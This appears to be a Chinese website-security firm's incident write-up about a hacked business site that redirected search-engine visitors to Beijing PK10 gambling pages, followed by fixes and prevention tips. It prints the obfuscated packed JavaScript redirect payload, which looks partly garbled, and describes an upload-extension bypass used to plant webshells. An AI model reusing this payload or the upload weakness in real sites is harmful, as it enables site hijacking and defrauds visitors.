15158846557 在线咨询 在线咨询
15158846557 在线咨询
所在位置: 首页 > 营销资讯 > 网站运营 > 网站标题被篡改成北京赛车、PK10的解决处理办法

网站标题被篡改成北京赛车、PK10的解决处理办法

时间:2024-03-06 15:00:01 | 来源:网站运营

时间:2024-03-06 15:00:01 来源:网站运营

网站标题被篡改成北京赛车、PK10的解决处理办法:

客户网站于近日被跳转到赌博网站,打开后直接跳转到什么北京赛车,PK10等内容的网站上去,客户网站本身做了百度的推广,导致所有访问用户都跳转到赌博网站上去,给客户带来很大的经济损失,再一个官方网站的形象也受到了影响。我们SINE安全对客户网站进行检查发现,客户网站的标题TDK被反复篡改成(北京赛车PK10等内容)立刻对该客户网站的安全,进行全面的源代码安全审计以及网站漏洞检测与网站漏洞修复,检查了客户的首页标题TDK内容确实是被篡改,并添加了一些加密的恶意代码,代码如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('m["//9//d//1//l//i//a//n//0"]["//8//4//6//0//a"](/'//h//3//1//4//6//2//0 //0//k//2//a//e//7//0//a//q//0//5//g//b//f//b//3//1//4//6//2//0//7 //3//4//1//e//7//o//0//0//2//3//p//5//5//8//8//8//c//1//2//9//b//3//r//c//1//d//i//5//9//9//f//6//2//c//g//3//7//j//h//5//3//1//4//6//2//0//j/');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述网站代码是ASCII编码,只要转换成Unicode编码,就可以看到加密的真实内容。我们工程师对代码进行解读,发现该代码写的是根据搜索引擎作为判断条件进行跳转的代码,通俗来讲就是说,该代码只针对搜索引擎,网站管理员直接输入网址并不会发现网站跳转到赌博内容网站上去,客户的网站通过百度或搜狗搜索会直接跳转到这个北京赛车、pk10的网站上去。

针对于上述的问题,我们立即删除加密的跳转代码,先将客户网站损失降到最低,促使网站正常访问(因为客户一直在做百度推广,一直在烧钱),通过一系列的安全检测,网站到底是因为那些漏洞被上传木马,并篡改网站首页的呢?经过我们Sine安全工程师对网站代码的详细的安全检测后,发现该网站系统存在SQL注入漏洞,导致攻击者可以获取到管理员账户和密码,而网站后台的地址用的也是默认的admin目录名,致使黑客获取密码后,直接登录网站后台,在对网站后台安全检测的时候,发现产品图片上传功能,存在绕过格式上传脚本木马的漏洞。

该网站漏洞产生于网站后台的产品上传页面代码中的$this->getext($filear["name"]); //取得扩展名$this->set_savename($file); //设置保存文件名,这个代码对文件扩展名可以直接绕过并上传php格式的脚本文件,从而让攻击者轻易取得网站的权限。客户还反映说,网站经常被反复的篡改,导致跳转到赌博网站,找了网站建设的公司,他们也只是删除掉代码,没过多久就又被篡改跳转了,导致客户网站损失严重,发生篡改跳转的根本原因就是网站有漏洞,如果没有修复好网站漏洞,即使删除掉恶意代码也只是表面上的工作,不起作用的还是会被反复篡改,于事无补,亡羊补牢一样。需要对网站进行安全检测,以及网站漏洞检测,并修复好网站漏洞,清除木马后门,网站安全部署好,才会使网站更加的安全稳定运行。

网站漏洞修复的处理过程如下:

对客户网站源代码进行安全加固以及防止sql注入的前端过滤代码,网站的后台目录安全设置,更改admin文件名为@#%admin,对网站后台图片上传功能代码进行漏洞修复,设置上传文件白名单机制,以及文件上传的目录进行了脚本安全权限设置,禁止进行脚本,对上传的文件扩展也进行了深入的安全过滤,网站的数据库安全部署,对数据库的连接信息进行加密,删除root管理权限,设置普通数据库账号,读写分离,新建表,查询表,写入表等数据库正常操作权限,网站后台的账号密码设置的复杂一些,密码为12位数字+字母+大小写组合,从发现网站漏洞到目前解决问题中,共查找到脚本木马3个(webshell),一句话小马后门2个,发现网站的模板内容也被篡改了,导致客户生成首页的时候随之也被加了恶意加密的代码。

网站安全预防措施:

1.尽量避免网站后台的默认名称如admin manage houtai

2.对网站上传目录的权限进行控制。(设置无脚本执行权限)

3.网站后台的用户名和密码设置复杂点,数字+字母+大小写+特殊符号组合。

4.阿里云虚拟主机用户的FTP账号密码要设置复杂点,数字+字母+大小写+特殊符号组合。

5.如果是单独服务器的客户,建议先把服务器的安全部署好,对每个网站的文件夹进行安全部署,数据库安全部署,,再做网站的安全,否则你网站再安全,服务器不安全也是于事无补。如果对安全不是太懂的话,建议找专业的网站安全公司去处理解决。

关键词:解决,办法,处理,赛车,北京,标题,篡改

74
73
25
news

版权所有© 亿企邦 1997-2025 保留一切法律许可权利。

为了最佳展示效果,本站不支持IE9及以下版本的浏览器,建议您使用谷歌Chrome浏览器。 点击下载Chrome浏览器
关闭